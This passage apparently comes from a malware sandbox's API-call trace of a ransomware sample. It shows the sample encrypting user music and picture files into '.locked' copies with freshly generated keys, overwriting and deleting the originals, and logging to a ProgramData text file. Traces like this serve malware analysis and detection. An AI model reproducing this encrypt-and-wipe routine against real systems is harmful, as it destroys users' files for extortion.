(lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\ZvLJyDLOgo\\YibDx1iNotnzBWQf\\8GJ8o0z9Qy_3x90hPI8\\tTnyiBf8Er6HDgClHWhw.wav.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\zvljydlogo\\yibdx1inotnzbwqf\\8gj8o0z9qy_3x90hpi8\\ttnyibf8er6hdgclhwhw.wav.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230 [0310.167] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0310.516] GetConsoleMode (in: hConsoleHandle=0x230, lpMode=0x1239dd9c | out: lpMode=0x1239dd9c) returned 0 [0310.516] WriteFile (in: hFile=0x1c8, lpBuffer=0x1392e000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125d8e78, lpOverlapped=0x0 | out: lpBuffer=0x1392e000*, lpNumberOfBytesWritten=0x125d8e78*=0xfa000, lpOverlapped=0x0) returned 1 [0310.544] CloseHandle (hObject=0x1c8) returned 1 [0310.562] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\zN zufeMLK.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\zn zufemlk.xlsx")) returned 1 [0310.624] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0310.660] SetEvent (hEvent=0x1f0) returned 1 [0310.660] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0310.766] SetEvent (hEvent=0x134) returned 1 [0310.766] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0310.939] SetEvent (hEvent=0x12c) returned 1 [0310.939] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0311.103] SetEvent (hEvent=0x214) returned 1 [0311.104] SetEvent (hEvent=0x1e8) returned 1 [0311.104] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0311.108] SetEvent (hEvent=0x214) returned 1 [0311.108] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0311.113] SetEvent (hEvent=0x1b8) returned 1 [0311.113] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0311.237] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\V1BQkFza0j-jprapAdp.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\v1bqkfza0j-jprapadp.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0311.238] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x125e1d9c | out: lpMode=0x125e1d9c) returned 0 [0311.238] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\V1BQkFza0j-jprapAdp.wav.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\v1bqkfza0j-jprapadp.wav.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0311.238] GetConsoleMode (in: hConsoleHandle=0x228, lpMode=0x125e1d9c | out: lpMode=0x125e1d9c) returned 0 [0311.238] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12390020 | out: pbBuffer=0x12390020) returned 1 [0311.238] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x127660b0 | out: pbBuffer=0x127660b0) returned 1 [0311.238] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12714201 | out: pbBuffer=0x12714201) returned 1 [0311.239] WriteFile (in: hFile=0x228, lpBuffer=0x1249a000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x125e1d78, lpOverlapped=0x0 | out: lpBuffer=0x1249a000*, lpNumberOfBytesWritten=0x125e1d78*=0x80, lpOverlapped=0x0) returned 1 [0311.360] ReadFile (in: hFile=0x1bc, lpBuffer=0x175ce000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e1d68, lpOverlapped=0x0 | out: lpBuffer=0x175ce000*, lpNumberOfBytesRead=0x125e1d68*=0x14ebc, lpOverlapped=0x0) returned 1 [0311.365] WriteFile (in: hFile=0x228, lpBuffer=0x175ce000*, nNumberOfBytesToWrite=0x14ebc, lpNumberOfBytesWritten=0x125e1d74, lpOverlapped=0x0 | out: lpBuffer=0x175ce000*, lpNumberOfBytesWritten=0x125e1d74*=0x14ebc, lpOverlapped=0x0) returned 1 [0311.431] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0311.569] ReadFile (in: hFile=0x1bc, lpBuffer=0x175ce000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e1d68, lpOverlapped=0x0 | out: lpBuffer=0x175ce000*, lpNumberOfBytesRead=0x125e1d68*=0x0, lpOverlapped=0x0) returned 1 [0311.569] CloseHandle (hObject=0x228) returned 1 [0311.643] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0311.878] CloseHandle (hObject=0x1bc) returned 1 [0311.878] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0311.879] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x125e1e94 | out: lpMode=0x125e1e94) returned 0 [0311.879] WriteFile (in: hFile=0x1bc, lpBuffer=0x1264a0c0*, nNumberOfBytesToWrite=0x39, lpNumberOfBytesWritten=0x125e1e64, lpOverlapped=0x0 | out: lpBuffer=0x1264a0c0*, lpNumberOfBytesWritten=0x125e1e64*=0x39, lpOverlapped=0x0) returned 1 [0311.879] CloseHandle (hObject=0x1bc) returned 1 [0311.880] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\V1BQkFza0j-jprapAdp.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\v1bqkfza0j-jprapadp.wav")) returned 1 [0312.203] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3422fb30, ulCount=0x10, ulNumEntriesRemoved=0x3422fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3422fb30, ulNumEntriesRemoved=0x3422fb10) returned 0 [0312.203] SetEvent (hEvent=0x1dc) returned 1 [0312.203] SetEvent (hEvent=0x180) returned 1 [0312.203] SetEvent (hEvent=0x21c) returned 1 [0312.251] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\V1BQkFza0j-jprapAdp.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\v1bqkfza0j-jprapadp.wav"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0312.426] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0312.543] GetConsoleMode (in: hConsoleHandle=0x19c, lpMode=0x125dde88 | out: lpMode=0x125dde88) returned 0 [0312.543] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x125fc000*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x12663a24, lpReserved=0x0 | out: lpBuffer=0x125fc000*, lpNumberOfCharsWritten=0x12663a24*=0xc) returned 1 [0312.547] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x1) returned 0x0 [0312.548] SetEvent (hEvent=0x220) returned 1 [0312.548] SetEvent (hEvent=0x1e8) returned 1 [0312.548] SetEvent (hEvent=0x1f0) returned 1 [0312.550] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0312.551] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3422fb34, ulCount=0x10, ulNumEntriesRemoved=0x3422fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3422fb34, ulNumEntriesRemoved=0x3422fb14) returned 0 [0312.551] SetEvent (hEvent=0x150) returned 1 [0312.551] SetEvent (hEvent=0x1f0) returned 1 [0312.551] SetEvent (hEvent=0x1e8) returned 1 [0312.551] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\ZvLJyDLOgo\\YibDx1iNotnzBWQf\\8GJ8o0z9Qy_3x90hPI8\\7C-ulOQENOkPtsd-.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\zvljydlogo\\yibdx1inotnzbwqf\\8gj8o0z9qy_3x90hpi8\\7c-uloqenokptsd-.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0312.553] GetConsoleMode (in: hConsoleHandle=0x208, lpMode=0x125dee88 | out: lpMode=0x125dee88) returned 0 [0312.553] WriteFile (in: hFile=0x208, lpBuffer=0x152c6000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125dee78, lpOverlapped=0x0 | out: lpBuffer=0x152c6000*, lpNumberOfBytesWritten=0x125dee78*=0xfa000, lpOverlapped=0x0) returned 1 [0312.583] CloseHandle (hObject=0x208) returned 1 [0312.584] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\ZvLJyDLOgo\\YibDx1iNotnzBWQf\\8GJ8o0z9Qy_3x90hPI8\\7C-ulOQENOkPtsd-.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\zvljydlogo\\yibdx1inotnzbwqf\\8gj8o0z9qy_3x90hpi8\\7c-uloqenokptsd-.mp3")) returned 1 [0312.650] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0312.715] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0312.721] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0312.747] SetEvent (hEvent=0x220) returned 1 [0312.747] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0312.801] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1263e000*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x1265ba24, lpReserved=0x0 | out: lpBuffer=0x1263e000*, lpNumberOfCharsWritten=0x1265ba24*=0xc) returned 1 [0312.836] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\CL8lPpx69.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\cl8lppx69.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0312.836] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x1265bd9c | out: lpMode=0x1265bd9c) returned 0 [0312.836] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\CL8lPpx69.png.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\cl8lppx69.png.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0312.837] GetConsoleMode (in: hConsoleHandle=0x200, lpMode=0x1265bd9c | out: lpMode=0x1265bd9c) returned 0 [0312.837] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1263e020 | out: pbBuffer=0x1263e020) returned 1 [0312.837] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x1234e0c0 | out: pbBuffer=0x1234e0c0) returned 1 [0312.837] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702201 | out: pbBuffer=0x12702201) returned 1 [0312.837] WriteFile (in: hFile=0x200, lpBuffer=0x12711000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1265bd78, lpOverlapped=0x0 | out: lpBuffer=0x12711000*, lpNumberOfBytesWritten=0x1265bd78*=0x80, lpOverlapped=0x0) returned 1 [0312.839] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x1) returned 0x0 [0312.844] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3422fb30, ulCount=0x10, ulNumEntriesRemoved=0x3422fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3422fb30, ulNumEntriesRemoved=0x3422fb10) returned 0 [0312.844] SetEvent (hEvent=0x150) returned 1 [0312.844] SetEvent (hEvent=0x1e8) returned 1 [0312.844] SetEvent (hEvent=0x12c) returned 1 [0312.844] SetEvent (hEvent=0x190) returned 1 [0312.844] ReadFile (in: hFile=0x1a4, lpBuffer=0x12770000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1265bd68, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesRead=0x1265bd68*=0x13ff4, lpOverlapped=0x0) returned 1 [0312.847] WriteFile (in: hFile=0x200, lpBuffer=0x12770000*, nNumberOfBytesToWrite=0x13ff4, lpNumberOfBytesWritten=0x1265bd74, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesWritten=0x1265bd74*=0x13ff4, lpOverlapped=0x0) returned 1 [0312.849] ReadFile (in: hFile=0x1a4, lpBuffer=0x12770000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1265bd68, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesRead=0x1265bd68*=0x0, lpOverlapped=0x0) returned 1 [0312.849] CloseHandle (hObject=0x200) returned 1 [0312.850] CloseHandle (hObject=0x1a4) returned 1 [0312.850] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x1) returned 0x102 [0312.854] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0312.854] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x1) returned 0x0 [0312.857] SetEvent (hEvent=0x14c) returned 1 [0312.857] SetEvent (hEvent=0x220) returned 1 [0312.857] SetEvent (hEvent=0x190) returned 1 [0312.857] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0312.863] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3422fb34, ulCount=0x10, ulNumEntriesRemoved=0x3422fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3422fb34, ulNumEntriesRemoved=0x3422fb14) returned 0 [0312.863] SetEvent (hEvent=0x150) returned 1 [0312.863] SetEvent (hEvent=0x190) returned 1 [0312.863] SetEvent (hEvent=0x220) returned 1 [0312.863] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0312.863] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x124a0e94 | out: lpMode=0x124a0e94) returned 0 [0312.863] WriteFile (in: hFile=0x1a4, lpBuffer=0x125740a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x124a0e64, lpOverlapped=0x0 | out: lpBuffer=0x125740a0*, lpNumberOfBytesWritten=0x124a0e64*=0x50, lpOverlapped=0x0) returned 1 [0312.863] CloseHandle (hObject=0x1a4) returned 1 [0312.864] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\CL8lPpx69.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\cl8lppx69.png")) returned 1 [0312.920] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x1) returned 0x0 [0312.923] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3422fb30, ulCount=0x10, ulNumEntriesRemoved=0x3422fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3422fb30, ulNumEntriesRemoved=0x3422fb10) returned 0 [0312.923] SetEvent (hEvent=0x150) returned 1 [0312.923] SetEvent (hEvent=0x14c) returned 1 [0312.923] SetEvent (hEvent=0x1b8) returned 1 [0312.923] SetEvent (hEvent=0x220) returned 1 [0312.924] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x1) returned 0x102 [0312.970] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0312.970] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x1) returned 0x102 [0312.971] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0312.971] SetEvent (hEvent=0x190) returned 1 [0312.971] SetEvent (hEvent=0x20c) returned 1 [0312.971] SetEvent (hEvent=0x1f0) returned 1 [0312.971] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0312.972] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3422fb34, ulCount=0x10, ulNumEntriesRemoved=0x3422fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3422fb34, ulNumEntriesRemoved=0x3422fb14) returned 0 [0312.972] SetEvent (hEvent=0x20c) returned 1 [0312.973] SetEvent (hEvent=0x1f0) returned 1 [0312.973] SetEvent (hEvent=0x190) returned 1 [0312.973] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\CL8lPpx69.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\cl8lppx69.png"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0312.987] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0313.009] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x125e1e88 | out: lpMode=0x125e1e88) returned 0 [0313.009] SwitchToThread () returned 1 [0313.011] SetEvent (hEvent=0x1f0) returned 1 [0313.011] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0313.016] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0313.041] SetEvent (hEvent=0x20c) returned 1 [0313.041] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0313.042] GetConsoleMode (in: hConsoleHandle=0x19c, lpMode=0x1249fe94 | out: lpMode=0x1249fe94) returned 0 [0313.042] WriteFile (in: hFile=0x19c, lpBuffer=0x125ee0c0*, nNumberOfBytesToWrite=0x56, lpNumberOfBytesWritten=0x1249fe64, lpOverlapped=0x0 | out: lpBuffer=0x125ee0c0*, lpNumberOfBytesWritten=0x1249fe64*=0x56, lpOverlapped=0x0) returned 1 [0313.042] CloseHandle (hObject=0x19c) returned 1 [0313.042] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\w158lXmEu7fV\\J_R4xdyvB0.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\w158lxmeu7fv\\j_r4xdyvb0.mp3")) returned 1 [0313.055] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0313.069] SetEvent (hEvent=0x20c) returned 1 [0313.069] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0313.079] SetEvent (hEvent=0x184) returned 1 [0313.079] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x1) returned 0x102 [0313.150] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0313.150] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x1) returned 0x102 [0313.155] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0313.155] SetEvent (hEvent=0x190) returned 1 [0313.155] SetEvent (hEvent=0x220) returned 1 [0313.155] SetEvent (hEvent=0x14c) returned 1 [0313.155] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0313.162] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3422fb34, ulCount=0x10, ulNumEntriesRemoved=0x3422fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3422fb34, ulNumEntriesRemoved=0x3422fb14) returned 0 [0313.162] SetEvent (hEvent=0x150) returned 1 [0313.162] SetEvent (hEvent=0x14c) returned 1 [0313.162] SetEvent (hEvent=0x220) returned 1 [0313.162] SetEvent (hEvent=0x1f0) returned 1 [0313.162] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0313.174] SetEvent (hEvent=0x12c) returned 1 [0313.174] SetEvent (hEvent=0x1b8) returned 1 [0313.174] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0313.182] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0313.188] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\w158lXmEu7fV\\J_R4xdyvB0.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\w158lxmeu7fv\\j_r4xdyvb0.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0313.443] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0313.503] GetConsoleMode (in: hConsoleHandle=0x200, lpMode=0x1249fe88 | out: lpMode=0x1249fe88) returned 0 [0313.503] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0313.529] SetEvent (hEvent=0x184) returned 1 [0313.529] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0313.529] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0313.534] SetEvent (hEvent=0x214) returned 1 [0313.534] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0313.653] SetEvent (hEvent=0x12c) returned 1 [0313.653] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0314.048] SetEvent (hEvent=0x190) returned 1 [0314.048] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0314.079] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\Dju4ZgDG1-unlMg\\Qp2s6QL8pHTr dp7.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\dju4zgdg1-unlmg\\qp2s6ql8phtr dp7.gif")) returned 1 [0314.099] SetEvent (hEvent=0x1f0) returned 1 [0314.099] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x1) returned 0x102 [0314.110] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0314.110] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x1) returned 0x102 [0314.112] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0314.112] SetEvent (hEvent=0x1b8) returned 1 [0314.112] SetEvent (hEvent=0x14c) returned 1 [0314.112] SetEvent (hEvent=0x184) returned 1 [0314.113] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0314.113] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3422fb34, ulCount=0x10, ulNumEntriesRemoved=0x3422fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3422fb34, ulNumEntriesRemoved=0x3422fb14) returned 0 [0314.113] SetEvent (hEvent=0x14c) returned 1 [0314.113] SetEvent (hEvent=0x184) returned 1 [0314.114] SetEvent (hEvent=0x1b8) returned 1 [0314.114] WriteFile (in: hFile=0x1a4, lpBuffer=0x12702380*, nNumberOfBytesToWrite=0x79, lpNumberOfBytesWritten=0x1276ee64, lpOverlapped=0x0 | out: lpBuffer=0x12702380*, lpNumberOfBytesWritten=0x1276ee64*=0x79, lpOverlapped=0x0) returned 1 [0314.114] CloseHandle (hObject=0x1a4) returned 1 [0314.115] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\bOgs768mC0sZS6u\\HhFJJPltLaMuNl.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\bogs768mc0szs6u\\hhfjjpltlamunl.png")) returned 1 [0314.137] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x1) returned 0x0 [0314.139] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3422fb30, ulCount=0x10, ulNumEntriesRemoved=0x3422fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3422fb30, ulNumEntriesRemoved=0x3422fb10) returned 0 [0314.139] SetEvent (hEvent=0x150) returned 1 [0314.139] SetEvent (hEvent=0x214) returned 1 [0314.139] SetEvent (hEvent=0x20c) returned 1 [0314.139] SetEvent (hEvent=0x1b8) returned 1 [0314.146] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\bOgs768mC0sZS6u\\HhFJJPltLaMuNl.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\bogs768mc0szs6u\\hhfjjpltlamunl.png"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0314.148] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0314.158] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x1276ee88 | out: lpMode=0x1276ee88) returned 0 [0314.158] WriteFile (in: hFile=0x1a4, lpBuffer=0x12770000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1276ee78, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesWritten=0x1276ee78*=0xfa000, lpOverlapped=0x0) returned 1 [0314.178] CloseHandle (hObject=0x1a4) returned 1 [0314.179] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\bOgs768mC0sZS6u\\HhFJJPltLaMuNl.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\bogs768mc0szs6u\\hhfjjpltlamunl.png")) returned 1 [0314.256] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0314.379] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c240*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x1705ba24, 